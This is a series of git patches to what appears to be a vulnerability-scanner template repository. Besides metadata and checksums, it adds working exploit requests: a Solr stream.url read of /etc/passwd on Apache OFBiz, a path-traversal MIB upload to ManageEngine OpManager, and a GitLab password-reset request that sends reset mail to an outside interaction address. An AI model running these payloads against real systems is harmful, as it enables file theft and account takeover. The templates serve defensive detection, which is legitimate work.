a/http/exposures/backups/php-backup-files.yaml +++ b/http/exposures/backups/php-backup-files.yaml @@ -49,6 +49,7 @@ http: - /config/settings.inc.php # prestashop > 1.5,1.6 - /config/settings.old.php # prestashop > 1.5,1.6 - /manager/includes/config.inc.php # MODX CMS + - /app/config/parameters.ini # Symfony - /db.php - /conn.php - /database.php From f99ab01416dffc21b4f8d148b61496b7c2b6a8f4 Mon Sep 17 00:00:00 2001 From: mastercho <souljanboy@gmail.com> Date: Mon, 8 Jan 2024 04:42:29 +0200 Subject: [PATCH 021/285] added match key for _wpeprivate/config.json according https://twitter.com/WllGates/status/1712965022341632245 --- .../wordpress/wordpress-accessible-wpconfig.yaml | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/http/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml b/http/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml index 0f27ba5f37..8287201b31 100644 --- a/http/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml +++ b/http/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml @@ -2,7 +2,7 @@ id: wordpress-accessible-wpconfig info: name: WordPress wp-config Detection - author: Kiblyn11,zomsop82,madrobot,geeknik,daffainfo,r12w4n,tess,0xpugazh + author: Kiblyn11,zomsop82,madrobot,geeknik,daffainfo,r12w4n,tess,0xpugazh,mastercho severity: medium description: WordPress `wp-config` was discovered. This file is remotely accessible and its content available for reading. classification: @@ -65,4 +65,10 @@ http: - "PASSWORD" condition: and + - type: word + part: body + words: + - "DB_USERNAME" + - "DB_PASSWORD" + condition: and # digest: 4b0a00483046022100f88f704a2270d5d54e06c42cfc035f9104301d9940f38771a55b0e4953384865022100e7453447cdf3813db80dc184271aa25b98a984fba38ddd9d7d4da1dd49575379:922c64590222798bb761d5b6d8e72950 From 8a7409c23ab43cbd2dabc826f60e24cee5a6dabb Mon Sep 17 00:00:00 2001 From: Shivam Saraswat <44198501+shivamsaraswat@users.noreply.github.com> Date: Mon, 8 Jan 2024 23:12:31 +0530 Subject: [PATCH 022/285] Added more words to microsoft-azure-error template --- http/miscellaneous/microsoft-azure-error.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/http/miscellaneous/microsoft-azure-error.yaml b/http/miscellaneous/microsoft-azure-error.yaml index cd8a2ce87e..fd388bee79 100644 --- a/http/miscellaneous/microsoft-azure-error.yaml +++ b/http/miscellaneous/microsoft-azure-error.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 1 shodan-query: title:"Microsoft Azure Web App - Error 404" - tags: error,azure,microsoft,misc + tags: error,azure,microsoft,misc,takeover http: - method: GET @@ -23,5 +23,7 @@ http: - type: word words: - "<title>Microsoft Azure Web App - Error 404" + - "Custom domain has not been configured inside Azure. See how to map an existing domain to resolve this." + condition: or # digest: 490a0046304402207f40d1e02b49c5a20b36bf6b47cf97a9eb871de346e70bb6d000e964c1e1dfbb02203dbac21b899cfc64285966fbc015627ff3f57693f3604fcb8da8caa4718b27f0:922c64590222798bb761d5b6d8e72950 From 57f6b5b8a221d326e6a1812ca0459fb0e1d3a97b Mon Sep 17 00:00:00 2001 From: your3cho <145323672+your3cho@users.noreply.github.com> Date: Fri, 12 Jan 2024 10:46:39 +0800 Subject: [PATCH 023/285] Create CVE-2022-47501 (Apache OFBiz < 18.12.07 - Local File Inclusion) --- http/cves/2022/CVE-2022-47501.yaml | 47 ++++++++++++++++++++++++++++++ 1 file changed, 47 insertions(+) create mode 100644 http/cves/2022/CVE-2022-47501.yaml diff --git a/http/cves/2022/CVE-2022-47501.yaml b/http/cves/2022/CVE-2022-47501.yaml new file mode 100644 index 0000000000..595ab1a68d --- /dev/null +++ b/http/cves/2022/CVE-2022-47501.yaml @@ -0,0 +1,47 @@ +id: CVE-2022-47501 + +info: + name: Apache OFBiz < 18.12.07 - Local File Inclusion + author: your3cho + severity: high + description: | + Arbitrary file reading vulnerability in Apache Software Foundation Apache OFBiz when using the Solr plugin. This is a pre-authentication attack. This issue affects Apache OFBiz: before 18.12.07. + reference: + - https://lists.apache.org/thread/k8s76l0whydy45bfm4b69vq0mf94p3wc + - http://www.openwall.com/lists/oss-security/2023/04/18/5 + - https://nvd.nist.gov/vuln/detail/CVE-2022-47501 + classification: + cve-id: CVE-2022-47501 + metadata: + shodan-query: html:"OFBiz" + fofa-query: app="Apache_OFBiz" + vendor: apache + product: ofbiz + tags: cve,cve2022,apache,ofbiz,lfi + +http: + - method: GET + path: + - "{{BaseURL}}/solr/solrdefault/debug/dump?param=ContentStreams&stream.url=file://{{path}}" + + payloads: + path: + - /etc/passwd + - c:/windows/win.ini + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: dsl + dsl: + - "regex('root:.*:0:0:', body)" + - "status_code == 200" + condition: and + + - type: dsl + dsl: + - "contains(body, 'bit app support')" + - "contains(body, 'fonts')" + - "contains(body, 'extensions')" + - "status_code == 200" + condition: and From 454fbd7ef072b970a86c53d355790b4ba579b8a6 Mon Sep 17 00:00:00 2001 From: your3cho <145323672+your3cho@users.noreply.github.com> Date: Fri, 12 Jan 2024 10:52:18 +0800 Subject: [PATCH 024/285] fix trailing spaces --- http/cves/2022/CVE-2022-47501.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/cves/2022/CVE-2022-47501.yaml b/http/cves/2022/CVE-2022-47501.yaml index 595ab1a68d..afdef5d404 100644 --- a/http/cves/2022/CVE-2022-47501.yaml +++ b/http/cves/2022/CVE-2022-47501.yaml @@ -1,4 +1,4 @@ -id: CVE-2022-47501 +id: CVE-2022-47501 info: name: Apache OFBiz < 18.12.07 - Local File Inclusion @@ -9,9 +9,9 @@ info: reference: - https://lists.apache.org/thread/k8s76l0whydy45bfm4b69vq0mf94p3wc - http://www.openwall.com/lists/oss-security/2023/04/18/5 - - https://nvd.nist.gov/vuln/detail/CVE-2022-47501 + - https://nvd.nist.gov/vuln/detail/CVE-2022-47501 classification: - cve-id: CVE-2022-47501 + cve-id: CVE-2022-47501 metadata: shodan-query: html:"OFBiz" fofa-query: app="Apache_OFBiz" From 71980238dca7854cd3a4707a288d996737b3d84b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 12 Jan 2024 12:16:30 +0530 Subject: [PATCH 025/285] minor update --- http/cves/2022/CVE-2022-47501.yaml | 12 ++++++++++-- 1 file changed, 10 insertions(+), 2 deletions(-) diff --git a/http/cves/2022/CVE-2022-47501.yaml b/http/cves/2022/CVE-2022-47501.yaml index afdef5d404..8ded167f7c 100644 --- a/http/cves/2022/CVE-2022-47501.yaml +++ b/http/cves/2022/CVE-2022-47501.yaml @@ -10,13 +10,21 @@ info: - https://lists.apache.org/thread/k8s76l0whydy45bfm4b69vq0mf94p3wc - http://www.openwall.com/lists/oss-security/2023/04/18/5 - https://nvd.nist.gov/vuln/detail/CVE-2022-47501 + - http://www.openwall.com/lists/oss-security/2023/04/18/9 + - http://www.openwall.com/lists/oss-security/2023/04/19/1 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 cve-id: CVE-2022-47501 + cwe-id: CWE-22 + epss-score: 0.00183 + epss-percentile: 0.55601 + cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* metadata: - shodan-query: html:"OFBiz" - fofa-query: app="Apache_OFBiz" vendor: apache product: ofbiz + shodan-query: html:"OFBiz" + fofa-query: app="Apache_OFBiz" tags: cve,cve2022,apache,ofbiz,lfi http: From 88720004fc92508edd3334bca01315bac180b19a Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Sat, 13 Jan 2024 18:35:55 +0900 Subject: [PATCH 026/285] Create CVE-2023-47211 A directory traversal vulnerability exists in the uploadMib functionality of ManageEngine OpManager 12.7.258. A specially crafted HTTP request can lead to arbitrary file creation. An attacker can send a malicious MiB file to trigger this vulnerability. Signed-off-by: GwanYeong Kim --- http/cves/2023/CVE-2023-47211.yaml | 118 +++++++++++++++++++++++++++++ 1 file changed, 118 insertions(+) create mode 100644 http/cves/2023/CVE-2023-47211.yaml diff --git a/http/cves/2023/CVE-2023-47211.yaml b/http/cves/2023/CVE-2023-47211.yaml new file mode 100644 index 0000000000..7e37b3ff9d --- /dev/null +++ b/http/cves/2023/CVE-2023-47211.yaml @@ -0,0 +1,118 @@ +id: CVE-2023-47211 + +info: + name: ManageEngine OpManager - Directory Traversal + author: gy741 + severity: high + description: | + A directory traversal vulnerability exists in the uploadMib functionality of ManageEngine OpManager 12.7.258. A specially crafted HTTP request can lead to arbitrary file creation. An attacker can send a malicious MiB file to trigger this vulnerability. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-47211 + - https://talosintelligence.com/vulnerability_reports/TALOS-2023-1851 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 8.6 + cve-id: CVE-2023-47211 + cwe-id: CWE-22 + epss-score: 0.000610000 + epss-percentile: 0.238320000 + cpe: cpe:2.3:a:zohocorp:manageengine_firewall_analyzer:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + shodan-query: http.title:"OpManager Plus" + tags: cve,cve2023,zoho,manageengine,authenticated,traversal + +http: + - raw: + - | + POST /two_factor_auth HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Accept-Encoding: gzip, deflate + Content-Type: application/x-www-form-urlencoded + + j_username={{username}}&j_password={{password}} + + - | + POST /client/api/json/mibbrowser/uploadMib HTTP/1.1 + Host: {{Hostname}} + X-ZCSRF-TOKEN: opmcsrftoken={{x_zcsrf_token}} + User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 + Content-Type: multipart/form-data; boundary=---------------------------372334936941313273904263503262 + + -----------------------------372334936941313273904263503262 + Content-Disposition: form-data; name="mibFile"; filename="karas.txt" + Content-Type: text/plain + + ../images/karas DEFINITIONS ::= BEGIN + + + IMPORTS + enterprises + FROM RFC1155-SMI; + + microsoft OBJECT IDENTIFIER ::= { enterprises 311 } + software OBJECT IDENTIFIER ::= { microsoft 1 } + systems OBJECT IDENTIFIER ::= { software 1 } + os OBJECT IDENTIFIER ::= { systems 3 } + windowsNT OBJECT IDENTIFIER ::= { os 1 } + windows OBJECT IDENTIFIER ::= { os 2 } + workstation OBJECT IDENTIFIER ::= { windowsNT 1 } + server OBJECT IDENTIFIER ::= { windowsNT 2 } + dc OBJECT IDENTIFIER ::= { windowsNT 3 } + + END + + -----------------------------372334936941313273904263503262-- + + - | + POST /client/api/json/mibbrowser/uploadMib HTTP/1.1 + Host: {{Hostname}} + X-ZCSRF-TOKEN: opmcsrftoken={{x_zcsrf_token}} + User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 + Content-Type: multipart/form-data; boundary=---------------------------372334936941313273904263503262 + + -----------------------------372334936941313273904263503262 + Content-Disposition: form-data; name="mibFile"; filename="karas.txt" + Content-Type: text/plain + + ../images/karas DEFINITIONS ::= BEGIN + + + IMPORTS + enterprises + FROM RFC1155-SMI; + + microsoft OBJECT IDENTIFIER ::= { enterprises 311 } + software OBJECT IDENTIFIER ::= { microsoft 1 } + systems OBJECT IDENTIFIER ::= { software 1 } + os OBJECT IDENTIFIER ::= { systems 3 } + windowsNT OBJECT IDENTIFIER ::= { os 1 } + windows OBJECT IDENTIFIER ::= { os 2 } + workstation OBJECT IDENTIFIER ::= { windowsNT 1 } + server OBJECT IDENTIFIER ::= { windowsNT 2 } + dc OBJECT IDENTIFIER ::= { windowsNT 3 } + + END + + -----------------------------372334936941313273904263503262-- + + redirects: true + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "application/json")' + - 'contains(body, "MIBFile with same name already exists")' + condition: and + + extractors: + - type: regex + name: x_zcsrf_token + group: 1 + internal: true + part: header + regex: + - 'Set-Cookie: opmcsrfcookie=([^;]{50,})' From 807184a3434cb4f48a3261b87fd6d83f0c73bfcf Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sat, 13 Jan 2024 16:36:00 +0530 Subject: [PATCH 027/285] lint fixes --- http/cves/2023/CVE-2023-47211.yaml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/http/cves/2023/CVE-2023-47211.yaml b/http/cves/2023/CVE-2023-47211.yaml index 7e37b3ff9d..5f6dd50a51 100644 --- a/http/cves/2023/CVE-2023-47211.yaml +++ b/http/cves/2023/CVE-2023-47211.yaml @@ -1,7 +1,7 @@ id: CVE-2023-47211 info: - name: ManageEngine OpManager - Directory Traversal + name: ManageEngine OpManager - Directory Traversal author: gy741 severity: high description: | @@ -34,7 +34,7 @@ http: Content-Type: application/x-www-form-urlencoded j_username={{username}}&j_password={{password}} - + - | POST /client/api/json/mibbrowser/uploadMib HTTP/1.1 Host: {{Hostname}} @@ -66,7 +66,7 @@ http: END -----------------------------372334936941313273904263503262-- - + - | POST /client/api/json/mibbrowser/uploadMib HTTP/1.1 Host: {{Hostname}} @@ -97,7 +97,7 @@ http: END - -----------------------------372334936941313273904263503262-- + -----------------------------372334936941313273904263503262-- redirects: true matchers: @@ -112,7 +112,7 @@ http: - type: regex name: x_zcsrf_token group: 1 - internal: true part: header regex: - 'Set-Cookie: opmcsrfcookie=([^;]{50,})' + internal: true From aab1f47ba13bc825a7a504dd8646382f5bd6b1ed Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 14 Jan 2024 12:58:32 +0530 Subject: [PATCH 028/285] Create CVE-2023-7028.yaml --- http/cves/2023/CVE-2023-7028.yaml | 77 +++++++++++++++++++++++++++++++ 1 file changed, 77 insertions(+) create mode 100644 http/cves/2023/CVE-2023-7028.yaml diff --git a/http/cves/2023/CVE-2023-7028.yaml b/http/cves/2023/CVE-2023-7028.yaml new file mode 100644 index 0000000000..eeda0873ad --- /dev/null +++ b/http/cves/2023/CVE-2023-7028.yaml @@ -0,0 +1,77 @@ +id: CVE-2023-7028 + +info: + name: GitLab Account Takeover via Password Reset without user interactions + author: DhiyaneshDk,rootxharsh,iamnooob,pdresearch + severity: critical + description: | + An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address. + reference: + - https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/ + - https://x.com/rwincey/status/1745659710089437368?s=20 + metadata: + verified: true + max-request: 2 + vendor: gitlab + product: gitlab + shodan-query: title:"Gitlab" + tags: cve,cve2023,gitlab,auth-bypass + +flow: | + http(1); + http(2); + +http: + - raw: + - | + GET /users/sign_in HTTP/1.1 + Host: {{Hostname}} + + - | + @timeout: 30s + POST /users/password HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 + Referer: {{RootURL}}/users/password/new + + authenticity_token={{token}}&user[email][]=admin@example.com&user[email][]=nuclei@{{interactsh-url}} + + matchers: + - type: dsl + dsl: + - "contains(interactsh_protocol, 'smtp')" + + extractors: + - type: regex + part: body + name: token + group: 1 + regex: + - name="authenticity_token" value="([A-Za-z0-9_-]+)" + internal: true + + - raw: + - | + @timeout: 30s + POST /users/password HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 + Referer: {{RootURL}}/users/password/new + + authenticity_token={{token}}&user[email][]={{username}}@{{RDN}}&user[email][]=nuclei@{{interactsh-url}} + + payloads: + username: + - admin + - root + - gitlab + - git + + matchers: + - type: dsl + dsl: + - "contains(interactsh_protocol, 'smtp')" From 16b6079a48240d08d6d34499989ed42a48effef4 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sun, 14 Jan 2024 17:46:26 +0530 Subject: [PATCH 029/285] misc updates --- http/cves/2023/CVE-2023-7028.yaml | 49 ++++++++++++++----------------- 1 file changed, 22 insertions(+), 27 deletions(-) diff --git a/http/cves/2023/CVE-2023-7028.yaml b/http/cves/2023/CVE-2023-7028.yaml index eeda0873ad..7b8a750e6d 100644 --- a/http/cves/2023/CVE-2023-7028.yaml +++ b/http/cves/2023/CVE-2023-7028.yaml @@ -1,7 +1,7 @@ id: CVE-2023-7028 info: - name: GitLab Account Takeover via Password Reset without user interactions + name: GitLab - Account Takeover via Password Reset author: DhiyaneshDk,rootxharsh,iamnooob,pdresearch severity: critical description: | @@ -9,6 +9,13 @@ info: reference: - https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/ - https://x.com/rwincey/status/1745659710089437368?s=20 + - https://gitlab.com/gitlab-org/gitlab/-/issues/436084 + - https://hackerone.com/reports/2293343 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N + cvss-score: 10 + cve-id: CVE-2023-7028 + cwe-id: CWE-284 metadata: verified: true max-request: 2 @@ -16,9 +23,9 @@ info: product: gitlab shodan-query: title:"Gitlab" tags: cve,cve2023,gitlab,auth-bypass - flow: | http(1); + set("token", template["token"][0]); http(2); http: @@ -27,25 +34,8 @@ http: GET /users/sign_in HTTP/1.1 Host: {{Hostname}} - - | - @timeout: 30s - POST /users/password HTTP/1.1 - Host: {{Hostname}} - Origin: {{RootURL}} - Content-Type: application/x-www-form-urlencoded - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 - Referer: {{RootURL}}/users/password/new - - authenticity_token={{token}}&user[email][]=admin@example.com&user[email][]=nuclei@{{interactsh-url}} - - matchers: - - type: dsl - dsl: - - "contains(interactsh_protocol, 'smtp')" - extractors: - type: regex - part: body name: token group: 1 regex: @@ -54,24 +44,29 @@ http: - raw: - | - @timeout: 30s + @timeout: 20s POST /users/password HTTP/1.1 Host: {{Hostname}} Origin: {{RootURL}} Content-Type: application/x-www-form-urlencoded - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: {{RootURL}}/users/password/new - authenticity_token={{token}}&user[email][]={{username}}@{{RDN}}&user[email][]=nuclei@{{interactsh-url}} + authenticity_token={{token}}&user[email][]={{username}}&user[email][]={{rand_base(6)}}@{{interactsh-url}} payloads: username: - - admin - - root - - gitlab - - git + - admin@example.com + - admin@{{RDN}} + - root@{{RDN}} + - gitlab@{{RDN}} + - git@{{RDN}} matchers: - type: dsl dsl: - - "contains(interactsh_protocol, 'smtp')" + - contains(interactsh_protocol, 'smtp') + + extractors: + - type: dsl + dsl: + - username From e2a90b152852dd95002c4f921297b2cfb52cf5e6 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sun, 14 Jan 2024 18:04:10 +0530 Subject: [PATCH 030/285] added intrusive tags --- http/cves/2023/CVE-2023-7028.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-7028.yaml b/http/cves/2023/CVE-2023-7028.yaml index 7b8a750e6d..0849003a55 100644 --- a/http/cves/2023/CVE-2023-7028.yaml +++ b/http/cves/2023/CVE-2023-7028.yaml @@ -22,7 +22,7 @@ info: vendor: gitlab product: gitlab shodan-query: title:"Gitlab" - tags: cve,cve2023,gitlab,auth-bypass + tags: cve,cve2023,gitlab,auth-bypass,intrusive flow: | http(1); set("token", template["token"][0]); From 073bbf45e13b47a4b8545c000d44895757411a85 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sun, 14 Jan 2024 13:17:29 +0000 Subject: [PATCH 031/285] Auto Generated New Template Addition List [Sun Jan 14 13:17:29 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 4349fd84fa..c660b2544f 100644 --- a/.new-additions +++ b/.new-additions @@ -20,6 +20,7 @@ http/cves/2023/CVE-2023-50968.yaml http/cves/2023/CVE-2023-51467.yaml http/cves/2023/CVE-2023-6379.yaml http/cves/2023/CVE-2023-6623.yaml +http/cves/2023/CVE-2023-7028.yaml http/cves/2024/CVE-2024-0352.yaml http/default-logins/camunda/camunda-default-login.yaml http/exposed-panels/goodjob-dashboard.yaml From e0091c22fa54010a343d2eacc849de245a2f8f18 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 14 Jan 2024 13:17:35 +0000 Subject: [PATCH 032/285] Auto Generated cves.json [Sun Jan 14 13:17:35 UTC 2024] :robot: --- cves.json | 2 ++ cves.json-checksum.txt | 2 +- 2 files changed, 3 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index dc1e6b0d57..6ba64db361 100644 --- a/cves.json +++ b/cves.json @@ -2232,6 +2232,7 @@ {"ID":"CVE-2023-4966","Info":{"Name":"Citrix Bleed - Leaking Session Tokens","Severity":"high","Description":"Sensitive information disclosure in NetScaler ADC and NetScaler Gateway when configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA ?virtual?server.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-4966.yaml"} {"ID":"CVE-2023-4974","Info":{"Name":"Academy LMS 6.2 - SQL Injection","Severity":"critical","Description":"A vulnerability was found in Academy LMS 6.2. It has been rated as critical. Affected by this issue is some unknown functionality of the file /academy/tutor/filter of the component GET Parameter Handler. The manipulation of the argument price_min/price_max leads to sql injection. The attack may be launched remotely. VDB-239750 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4974.yaml"} {"ID":"CVE-2023-5074","Info":{"Name":"D-Link D-View 8 v2.0.1.28 - Authentication Bypass","Severity":"critical","Description":"Use of a static key to protect a JWT token used in user authentication can allow an for an authentication bypass in D-Link D-View 8 v2.0.1.28\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5074.yaml"} +{"ID":"CVE-2023-50917","Info":{"Name":"MajorDoMo thumb.php - OS Command Injection","Severity":"critical","Description":"MajorDoMo (aka Major Domestic Module) before 0662e5e allows command execution via thumb.php shell metacharacters. NOTE: this is unrelated to the Majordomo mailing-list manager.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-50917.yaml"} {"ID":"CVE-2023-50968","Info":{"Name":"Apache OFBiz \u003c 18.12.11 - Server Side Request Forgery","Severity":"high","Description":"Arbitrary file properties reading vulnerability in Apache Software Foundation Apache OFBiz when user operates an uri call without authorizations. The same uri can be operated to realize a SSRF attack also without authorizations. Users are recommended to upgrade to version 18.12.11, which fixes this issue.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-50968.yaml"} {"ID":"CVE-2023-51467","Info":{"Name":"Apache OFBiz \u003c 18.12.11 - Remote Code Execution","Severity":"critical","Description":"The vulnerability allows attackers to bypass authentication to achieve a simple Server-Side Request Forgery (SSRF)\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-51467.yaml"} {"ID":"CVE-2023-5244","Info":{"Name":"Microweber \u003c V.2.0 - Cross-Site Scripting","Severity":"medium","Description":"Reflected Cross-Site Scripting Vulnerability in types GET parameter on the /editor_tools/rte_image_editor endpoint.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-5244.yaml"} @@ -2246,6 +2247,7 @@ {"ID":"CVE-2023-6380","Info":{"Name":"OpenCms 14 \u0026 15 - Open Redirect","Severity":"medium","Description":"Open redirect vulnerability has been found in the Open CMS product affecting versions 14 and 15 of the 'Mercury' template\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-6380.yaml"} {"ID":"CVE-2023-6553","Info":{"Name":"Worpress Backup Migration \u003c= 1.3.7 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.3.7 via the /includes/backup-heart.php file. This is due to an attacker being able to control the values passed to an include, and subsequently leverage that to achieve remote code execution. This makes it possible for unauthenticated threat actors to easily execute code on the server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6553.yaml"} {"ID":"CVE-2023-6623","Info":{"Name":"Essential Blocks \u003c 4.4.3 - Local File Inclusion","Severity":"critical","Description":"Wordpress Essential Blocks plugin prior to 4.4.3 was discovered to be vulnerable to a significant Local File Inclusion vulnerability that may be exploited by any attacker, regardless of whether they have an account on the site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6623.yaml"} +{"ID":"CVE-2023-7028","Info":{"Name":"GitLab - Account Takeover via Password Reset","Severity":"critical","Description":"An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2023/CVE-2023-7028.yaml"} {"ID":"CVE-2024-0352","Info":{"Name":"Likeshop \u003c 2.5.7.20210311 - Arbitrary File Upload","Severity":"high","Description":"A vulnerability classified as critical was found in Likeshop up to 2.5.7.20210311. This vulnerability affects the function FileServer::userFormImage of the file server/application/api/controller/File.php of the component HTTP POST Request Handler. The manipulation of the argument file with an unknown input leads to a unrestricted upload vulnerability. The CWE definition for the vulnerability is CWE-434\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2024/CVE-2024-0352.yaml"} {"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"} {"ID":"CVE-2011-2523","Info":{"Name":"VSFTPD 2.3.4 - Backdoor Command Execution","Severity":"critical","Description":"VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2011/CVE-2011-2523.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index 15ab33ae37..eb7b6968b3 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -a998cd2b3adce2edceb6de0fdac96f95 +d205eefc147d9cb245a79c42d8aff090 From 6e8cad44fc8a6a29e69409be69b0b9adafdbc310 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 14 Jan 2024 13:17:50 +0000 Subject: [PATCH 033/285] Auto Generated Templates Checksum [Sun Jan 14 13:17:50 UTC 2024] :robot: --- templates-checksum.txt | 12 +++++++++--- 1 file changed, 9 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 99f53f546d..3d2e5ff158 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -21,7 +21,12 @@ code/cves/2021/CVE-2021-3156.yaml:2f12cbb209881079450613554e1fa0cf526eb952 code/cves/2023/CVE-2023-2640.yaml:50153a9f47faa62533d609faec8d12113d620354 code/cves/2023/CVE-2023-49105.yaml:3512873783f700bf5fb98b342dd84653085a0a79 code/cves/2023/CVE-2023-4911.yaml:b0087888697dcdbdf06ec95866cf08fcd6a2a76a -config/recommended.yml:56cce704c23915f282aa2bca69952626aeea5e13 +config/bugbounty.yml:05aaced1241dba5b3c3b37559269b1cae473f52f +config/cloud.yml:454e596d8ca3f19213b148f6c54c20806cb87a8e +config/compliance.yml:367b57e7e900f92bc8d9e5883e635e975da0cae9 +config/osint.yml:846ae0c6f62f669b094a5e1dd47843fd5ff32395 +config/pentest.yml:e3a9ebe543e9c2d046ead1efc292394b54a55196 +config/recommended.yml:d95863b9d5d9e86430e1560668df428a6fa96c2e contributors.json:8d840b1db8c1af9a3927448841f817aa9c850de9 cves.json:f9bd7e2d4a4b665102f317f8f817f6f784d6f848 cves.json-checksum.txt:33279154a564aeefb5bc61ab0f37de72d0c74d6c @@ -2923,6 +2928,7 @@ http/cves/2023/CVE-2023-6379.yaml:7005bdf0269c634bb599e6be3de8bc565b18b860 http/cves/2023/CVE-2023-6380.yaml:15f74e719b8448c91780cbe080fb867d34f08788 http/cves/2023/CVE-2023-6553.yaml:9ed9fbd3c2b73e9bf9b3bc50369f7df7d25e1cc0 http/cves/2023/CVE-2023-6623.yaml:88b7ee2c84d5e2114c51c7f960270fbe90162ca5 +http/cves/2023/CVE-2023-7028.yaml:6f09d4549ec0829f73a06e6e18aff2f7632ab96e http/cves/2024/CVE-2024-0352.yaml:a5dc7e2fad942074c79ae2b4d7186f6598edfd05 